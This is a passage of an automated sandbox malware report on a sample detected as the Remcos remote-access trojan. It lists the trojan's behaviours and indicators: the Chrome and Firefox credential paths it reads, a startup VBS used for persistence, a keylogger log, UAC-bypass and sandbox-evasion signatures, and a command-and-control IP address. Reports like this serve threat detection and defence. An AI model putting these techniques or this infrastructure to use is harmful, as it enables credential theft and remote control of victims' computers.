                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\8
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\rA'
                    Source: Milburr.exe, 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: Milburr.exe, 00000002.00000002.4574103580.0000000001238000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B7862B cpuid 0_2_00B7862B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,2_2_004470AE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,2_2_004510BA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004511E3
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,2_2_004512EA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_004513B7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,2_2_00447597
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoA,2_2_0040E679
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00450A7F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,2_2_00450CF7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,2_2_00450D42
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,2_2_00450DDD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00450E6A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,5_2_004470AE
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,5_2_004510BA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004511E3
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,5_2_004512EA
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_004513B7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,5_2_00447597
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoA,5_2_0040E679
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00450A7F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,5_2_00450CF7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,5_2_00450D42
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: EnumSystemLocalesW,5_2_00450DDD
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00450E6A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B84E87
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B91E06 GetUserNameW,0_2_00B91E06
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B83F3A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00B549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B549A0
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                    Source: l1QC9H0SNR.exe, 00000000.00000003.2120110912.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000002.2131421488.000000000104A000.00000004.00000020.00020000.00000000.sdmp, l1QC9H0SNR.exe, 00000000.00000003.2120047789.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4574070147.0000000001213000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2270035484.0000000001027000.00000004.00000020.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281229333.00000000015C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040B21B
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \key3.db2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: \key3.db5_2_0040B335
                    Source: Milburr.exeBinary or memory string: WIN_81
                    Source: Milburr.exeBinary or memory string: WIN_XP
                    Source: Milburr.exeBinary or memory string: WIN_XPe
                    Source: Milburr.exeBinary or memory string: WIN_VISTA
                    Source: Milburr.exeBinary or memory string: WIN_7
                    Source: Milburr.exeBinary or memory string: WIN_8
                    Source: Milburr.exe, 00000005.00000002.2280550392.0000000000774000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDHJump to behavior
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDHJump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: cmd.exe2_2_00405042
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: cmd.exe5_2_00405042
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BC6283
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BC6747
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00736283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00736283
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00736747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00736747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		2
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		121
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol121
                    Input Capture                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		2
                    Valid Accounts                    		1
                    Bypass User Account Control                    		21
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Windows Service                    		2
                    Valid Accounts                    		1
                    Software Packing                    		NTDS4
                    File and Directory Discovery                    		Distributed Component Object ModelInput Capture1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd2
                    Registry Run Keys / Startup Folder                    		21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets26
                    System Information Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Windows Service                    		1
                    Bypass User Account Control                    		Cached Domain Credentials241
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items22
                    Process Injection                    		1
                    Masquerading                    		DCSync1
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		Proc Filesystem2
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow11
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd22
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1588244 Sample: l1QC9H0SNR.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 31 Suricata IDS alerts for network traffic 2->31 33 Found malware configuration 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 10 other signatures 2->37 7 l1QC9H0SNR.exe 6 2->7         started        11 wscript.exe 1 2->11         started        process3 file4 23 C:\Users\user\AppData\Local\...\Milburr.exe, PE32 7->23 dropped 43 Binary is likely a compiled AutoIt script file 7->43 45 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->45 13 Milburr.exe 3 6 7->13         started        47 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->47 18 Milburr.exe 2 11->18         started        signatures5 process6 dnsIp7 29 192.210.150.26, 3678, 49709, 49711 AS-COLOCROSSINGUS United States 13->29 25 C:\Users\user\AppData\Roaming\...\Milburr.vbs, data 13->25 dropped 27 C:\ProgramData\remcos\logs.dat, data 13->27 dropped 49 Multi AV Scanner detection for dropped file 13->49 51 Contains functionality to bypass UAC (CMSTPLUA) 13->51 53 Detected Remcos RAT 13->53 59 7 other signatures 13->59 55 Binary is likely a compiled AutoIt script file 18->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->57 20 Milburr.exe 2 18->20         started        file8 signatures9 process10 signatures11 39 Detected Remcos RAT 20->39 41 Binary is likely a compiled AutoIt script file 20->41

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    l1QC9H0SNR.exe68%VirustotalBrowse
                    l1QC9H0SNR.exe75%ReversingLabsWin32.Backdoor.Remcos
                    l1QC9H0SNR.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\obtenebrate\Milburr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\obtenebrate\Milburr.exe75%ReversingLabsWin32.Backdoor.Remcos

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpMilburr.exefalse
                      		high
                      http://geoplugin.net/json.gp/CMilburr.exe, 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Milburr.exe, 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        192.210.150.26
                        		unknownUnited States
                        		36352AS-COLOCROSSINGUStrue

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1588244
                        Start date and time:2025-01-10 22:59:35 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 8s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:l1QC9H0SNR.exe
                        renamed because original name is a hash value
                        Original Sample Name:c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@8/13@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 58
                        • Number of non-executed functions: 279
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        17:01:01API Interceptor7116284x Sleep call for process: Milburr.exe modified
                        23:00:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        192.210.150.26bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                          FACTURA.xlsxGet hashmaliciousRemcosBrowse
                            7056ZCiFdE.exeGet hashmaliciousRemcosBrowse
                              uIarPolvHR.exeGet hashmaliciousRemcosBrowse
                                IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                  z49FACTURA-0987678.exeGet hashmaliciousRemcosBrowse
                                    FAT6789098700900.scr.exeGet hashmaliciousRemcosBrowse
                                      Rgh99876k7e.exeGet hashmaliciousRemcosBrowse
                                        SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                          FTE98767800000.bat.exeGet hashmaliciousRemcosBrowse

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AS-COLOCROSSINGUSMLxloAVuCZ.exeGet hashmaliciousRemcosBrowse
                                            • 192.3.64.152
                                            bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                            • 192.210.150.26
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            sh4.elfGet hashmaliciousMiraiBrowse
                                            • 23.95.117.229
                                            sweetnessgoodforgreatnessthingswithgood.tIF.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 192.3.27.144
                                            begoodforeverythinggreatthingsformebetterforgood.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                            • 192.3.27.144
                                            PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144
                                            PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                            • 192.3.27.144

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\remcos\logs.dat

                                            Download File
                                            Process:C:\Users\user\AppData\Local\obtenebrate\Milburr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):204
                                            Entropy (8bit):3.3359425119253987
                                            Encrypted:false
                                            SSDEEP:3:rglsOlfUlSl9U5JWRal2Jl+7R0DAlBG45klovDl64oojklovDl6v:Mls6UlSs5YcIeeDAlOWA41gWAv
                                            MD5:536B536A90D98BBCC091AC5516A08495
                                            SHA1:BEE4E3E04B0BBCF197AB6EE93E63D3BBC4135207
                                            SHA-256:86D354A89109E6510CA5DB58B055238D464BC032BDF02F41DA959C4894C678D7
                                            SHA-512:C677633380C66A0E994CF3B3DDC6A63720D93E32AC5BD8D5638BDFAADC1C315DFB65F7B446ED44217CD41E047C09B055D1023360F0B4DCC26B16E397AD3FF42E
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                            Reputation:low
                                            Preview:....[.2.0.2.5./.0.1./.1.0. .1.7.:.0.0.:.2.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                            C:\Users\user\AppData\Local\Temp\Charley

                                            Download File
                                            Process:C:\Users\user\Desktop\l1QC9H0SNR.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):492544
                                            Entropy (8bit):7.568668414012018
                                            Encrypted:false
                                            SSDEEP:12288:Bk1P31hPfYMVOxdwC2kEPuqzrgGqHkg6H9yy4zG5F1i4xP:Bk1P319fYlByPuqfgXb6DtXi4xP
                                            MD5:E8F92D99524EFF3DE429C3718B7A1491
                                            SHA1:B0C6F6A240841E77E7D20F99B379A9C6EE35D85B
                                            SHA-256:894CB71AD99FF88B5C93218788DE1D133B4D0404D4996F7E5D3255209322F6E9
                                            SHA-512:4CF796747DB21C4EB2CDA23FB79E184C49B62B2E84E15B669A0025224991E4F9E0E261C6E03A12DD8B5E6B105D2AA7E8E652AA3F4863CEC73A88BC02906C17D6
                                            Malicious:false
                                            Reputation:low
